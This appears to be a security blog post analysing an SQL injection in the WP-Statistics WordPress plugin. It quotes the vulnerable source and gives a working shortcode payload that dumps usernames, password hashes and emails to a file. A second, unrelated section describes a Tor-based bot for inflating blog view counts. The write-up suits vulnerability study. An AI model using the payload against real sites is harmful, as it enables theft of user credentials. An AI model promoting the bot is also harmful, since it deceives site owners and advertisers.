WP-Statistics Plugin SQL Injection Vulnerability Analysis

Requirements:

WP-Statistics Plugin Version <= 12.0.7
Least Permission account  : Subscriber account (with post edit permission)

Why it easy to exploit?

This vulnerability is caused by the lack of sanitization in user provided data.
An attacker with at least a subscriber account could leak sensitive data and under the right circumstances/configurations compromise your WordPress installation.

How it actually Works?

WordPress provides an API that enables developers to create content that users caninject to certain pages just using a simple shortcode:

[shortcode atts_1=”test” atts_2=”test”]

Among other functionalities, WP Statistics allows admin users to get detailed information related with the number of visits by just calling the shortcode below:

//wp-content/plugins/wp-statistics-12.0.7/shortcode.php <?php add_shortcode( 'wpstatistics', 'wp_statistics_shortcodes' ); add_filter( 'widget_text', 'do_shortcode' ); function wp_statistics_shortcodes( $atts ) { /* WP Statitics shortcode is in the format of: [wpstatistics stat=xxx time=xxxx provider=xxxx format=xxxxxx id=xxx] Where: stat = the statistic you want. time = is the timeframe, strtotime() (http://php.net/manual/en/datetime.formats.php) will be used to calculate it. provider = the search provider to get stats on. format = i18n, english, none. id = the page/post id to get stats on. */ if ( ! is_array( $atts ) ) { return; } if ( ! array_key_exists( 'stat', $atts ) ) { return;} if ( ! array_key_exists( 'time', $atts ) ) { $atts['time'] = null; } if ( ! array_key_exists( 'provider', $atts ) ) { $atts['provider'] = 'all';} if ( ! array_key_exists( 'format', $atts ) ) { $atts['format'] = null;} if ( ! array_key_exists( 'id', $atts ) ) { $atts['id'] = - 1; } $formatnumber = array_key_exists( 'format', $atts ); switch ( $atts['stat'] ) { case 'usersonline': $result = wp_statistics_useronline(); break; case 'visits': $result = wp_statistics_visit( $atts['time'] ); break; case 'visitors': $result = wp_statistics_visitor( $atts['time'], null, true ); break; case 'pagevisits': $result = wp_statistics_pages( $atts['time'], null, $atts['id'] ); break; case 'searches': $result = wp_statistics_searchengine( $atts['provider'], $atts['time'] ); break; }  

a1.The WP Statistics shortcode that allows admins to obtain detailed visit information.

For example :  WP-Statistics  Shortcode

    User Online: [wpstatistics stat=usersonline]
    Today Visitor: [wpstatistics stat=visitors time=today]
    Today Visit: [wpstatistics stat=visits time=today]
    Yesterday Visitor: [wpstatistics stat=visitors time=yesterday]
    Yesterday Visit: [wpstatistics stat=visits time=yesterday]
    Total Visitor: [wpstatistics stat=visitors time=total]
    Total Visit: [wpstatistics stat=visits time=total]

 

As you can see on the above code a1, some attributes of the shortcode wpstatistics are being passed as parameters for important functions and this shouldn’t be a problem if those parameters were sanitized,but as we’ll see this is not the case.

For example:  $result = wp_statistics_searchengine( $atts['provider'], $atts['time'] );

//wp-content/plugins/wp-statistics-12.0.7/includes/functions/functions.php function wp_statistics_searchengine( $search_engine = 'all', $time = 'total' ) { global $wpdb, $WP_Statistics; // Determine if we're using the old or new method of storing search engine info and build the appropriate table name. $tablename = $wpdb->prefix . 'statistics_'; if ( $WP_Statistics->get_option( 'search_converted' ) ) { $tablename .= 'search'; } else { $tablename .= 'visitor'; } // Get a complete list of search engines var_dump($search_engine); $search_query = wp_statistics_searchengine_query( $search_engine ); var_dump($search_query); // This function accepts several options for time parameter, each one has a unique SQL query string. // They're pretty self explanatory. switch ( $time ) { case 'today': $result = $wpdb->query( "SELECT * FROM `{$tablename}` WHERE `last_counter` = '{$WP_Statistics->Current_Date( 'Y-m-d' )}' AND {$search_query}" ); break; case 'yesterday': $result = $wpdb->query( "SELECT * FROM `{$tablename}` WHERE `last_counter` = '{$WP_Statistics->Current_Date( 'Y-m-d', -1 )}' AND {$search_query}" ); break; case 'week': $result = $wpdb->query( "SELECT * FROM `{$tablename}` WHERE `last_counter` = '{$WP_Statistics->Current_Date( 'Y-m-d', -7 )}' AND {$search_query}" ); break; case 'month': $result = $wpdb->query( "SELECT * FROM `{$tablename}` WHERE `last_counter` = '{$WP_Statistics->Current_Date( 'Y-m-d', -30 )}' AND {$search_query}" ); break; case 'year': $result = $wpdb->query( "SELECT * FROM `{$tablename}` WHERE `last_counter` = '{$WP_Statistics->Current_Date( 'Y-m-d', -365 )}' AND {$search_query}" ); break; case 'total': $result = $wpdb->query( "SELECT * FROM `{$tablename}` WHERE {$search_query}" ); break; default: $result = $wpdb->query( "SELECT * FROM `{$tablename}` WHERE `last_counter` = '{$WP_Statistics->Current_Date( 'Y-m-d', $time)}' AND {$search_query}" ); break; } return $result; }

One of the vulnerable functions wp_statistics_searchengine_query() in the file “includes/functions/functions.php” is accessible through WordPress’ AJAX functionality through function wp_ajax_parse_media_shortcode().

//wp-content/plugins/wp-statistics-12.0.7/includes/functions/functions.php function wp_statistics_searchengine_query( $search_engine = 'all' ) { GLOBAL $WP_Statistics; // Get a complete list of search engines $searchengine_list = wp_statistics_searchengine_list(); $search_query = ''; if ( $WP_Statistics->get_option( 'search_converted' ) ) { // Are we getting results for all search engines or a specific one? if ( strtolower( $search_engine ) == 'all' ) { // For all of them? Ok, look through the search engine list and create a SQL query string to get them all from the database. foreach ( $searchengine_list as $key => $se ) { $search_query .= "`engine` = '{$key}' OR "; } // Trim off the last ' OR ' for the loop above. $search_query = substr( $search_query, 0, strlen( $search_query ) - 4 ); } else { $search_query .= "`engine` = '{$search_engine}'"; } } else { // Are we getting results for all search engines or a specific one? if ( strtolower( $search_engine ) == 'all' ) { // For all of them? Ok, look through the search engine list and create a SQL query string to get them all from the database. // NOTE: This SQL query can be long. foreach ( $searchengine_list as $se ) { // The SQL pattern for a search engine may be an array if it has to handle multiple domains (like google.com and google.ca) or other factors. if ( is_array( $se['sqlpattern'] ) ) { foreach ( $se['sqlpattern'] as $subse ) { $search_query .= "`referred` LIKE '{$subse}' OR "; } } else { $search_query .= "`referred` LIKE '{$se['sqlpattern']}' OR "; } } // Trim off the last ' OR ' for the loop above. $search_query = substr( $search_query, 0, strlen( $search_query ) - 4 ); } else { // For just one? Ok, the SQL pattern for a search engine may be an array if it has to handle multiple domains (like google.com and google.ca) or other factors. if ( is_array( $searchengine_list[ $search_engine ]['sqlpattern'] ) ) { foreach ( $searchengine_list[ $search_engine ]['sqlpattern'] as $se ) { $search_query .= "`referred` LIKE '{$se}' OR "; } // Trim off the last ' OR ' for the loop above. $search_query = substr( $search_query, 0, strlen( $search_query ) - 4 ); } else { $search_query .= "`referred` LIKE '{$searchengine_list[$search_engine]['sqlpattern']}'"; } } } return $search_query; }

This function doesn’t check for additional privileges, allowing subscribers to execute this shortcode and inject malicious data to its attributes.

In a number places in the code, user input coming from attributes of the wpstatistics’ shortcode are included in SQL queries without being sanitized. Below one of the queries that were exploitable:
 

//wp-content/plugins/wp-statistics-12.0.7/includes/functions/functions.php $search_query = wp_statistics_searchengine_query( $search_engine ); // This function accepts several options for time parameter, each one has a unique SQL query string. // They're pretty self explanatory. switch ( $time ) { case 'today': $result = $wpdb->query( "SELECT * FROM `{$tablename}` WHERE `last_counter` = '{$WP_Statistics->Current_Date( 'Y-m-d' )}' AND {$search_query}" ); break; case 'yesterday': $result = $wpdb->query( "SELECT * FROM `{$tablename}` WHERE `last_counter` = '{$WP_Statistics->Current_Date( 'Y-m-d', -1 )}' AND {$search_query}" ); break; case 'week': $result = $wpdb->query( "SELECT * FROM `{$tablename}` WHERE `last_counter` = '{$WP_Statistics->Current_Date( 'Y-m-d', -7 )}' AND {$search_query}" ); break; case 'month': $result = $wpdb->query( "SELECT * FROM `{$tablename}` WHERE `last_counter` = '{$WP_Statistics->Current_Date( 'Y-m-d', -30 )}' AND {$search_query}" ); break; case 'year': $result = $wpdb->query( "SELECT * FROM `{$tablename}` WHERE `last_counter` = '{$WP_Statistics->Current_Date( 'Y-m-d', -365 )}' AND {$search_query}" ); break; case 'total': $result = $wpdb->query( "SELECT * FROM `{$tablename}` WHERE {$search_query}" ); break; default: $result = $wpdb->query( "SELECT * FROM `{$tablename}` WHERE `last_counter` = '{$WP_Statistics->Current_Date( 'Y-m-d', $time)}' AND {$search_query}" ); break; } return $result; }

The wp_statistics_searchengine_query() basically returns the same value as the one passed in the shortcode attribute provider and its content is added directly to the raw SQL query.

Exploit Phase:

When user (subscriber) enter shortcode in post  as  [wpstatistics stat="searches" provider="Google"]

it will call  wp_statistics_searchengine() with provider="Google", then it call another function wp_statistics_searchengine_query( ), as a result it form a SQL query  and stored in variable in $search_query.

 $search_query .= "`engine` = '{$search_engine}'";

Here  search engine = "Google". which will be as  $search_query = "`engine` = 'Google'"

It is directly input in most of the SQL queries i.e see below SQL queries statement

$result = $wpdb->query( "SELECT * FROM `{$tablename}` WHERE `last_counter` = '{$WP_Statistics->Current_Date( 'Y-m-d' )}' AND {$search_query}" );

so user input is not sanitized on parameter provider, so which allow user to injection any  malicious queries to fetch data from database

For Example:
 This payload will get username, password and email from database and stored into test.txt file.

[wpstatistics stat="searches" provider="123' union select 1,2,user_login,user_pass,user_email,6 from wp_users into outfile '/var/www/html/waf-demo/wp-content/uploads/test.txt'#"]

Demo Video:

Credits:

•  Umar Farook: [Security Engineer | Researcher]
•  FOS Team : [Fools of Security]

 Support !

•  Email address:[FOS]  for more details.
•  Github:[FOS]
•  Youtube: [FOS] 

Disclaimer: For Educational purpose only, We DO NOT take responsibility of any harm caused by this method to any one or any organization.

FOS - Blog Views Bot

Blog Views Bot

We create this python script for fun to increase blog user view traffic on  website through Tor Network i.e blog user view with different country IP address for every request:)

Getting Started

    git clone https://github.com/umarfarook882/Blog-Views-Bot.git

    cd Blog-Views-Bot

    chmod +x blog-view.py

    python blog-view.py

Requirements

•  Linux operating system with python (Kali linux (or) other Linux OS) or windows with python installed.

• Python2.x [Recommended] or above must installed in Linux or Windows for this tool to work.                                                                                                    
• Install TorRequest Package for sending request via tor.        

                pip install TorRequest                                             

Download
        Python:[Python 2.x or above]
        Tor Browser:[Tor Browser]
        TorRequest:[TorRequest package]
 
How it works

1.   Install and run the tor browser
2.   After successfully tor is connected, install the TorRequest package.
3.   Run:Python blog-view.py
4.   Enter your Blog Address  i.e with Protocol(http/https).
5.   Enter The number of Viewers.
6.   Wait for few seconds, it will automatically make request to blog address with different Tor IP address.    

Demo 

  

Credits:

•  Umar Farook: [Security Engineer | Researcher]
•  FOS Team : [Fools of Security]

 Support !

•  Email address:[FOS]  for more details.
•  Github:[FOS]
•  Youtube: [FOS] 

       
Disclaimer: For Educational purpose only, We DO NOT take responsibility of any harm caused by this method to any one or any organization.